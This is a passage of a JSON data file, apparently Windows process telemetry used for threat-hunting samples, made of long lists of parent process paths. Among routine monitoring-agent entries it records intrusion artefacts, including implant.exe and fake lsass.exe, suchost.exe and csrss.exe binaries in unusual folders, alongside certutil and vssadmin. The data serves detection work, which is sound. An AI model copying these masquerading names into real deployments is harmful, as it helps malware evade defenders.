Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program 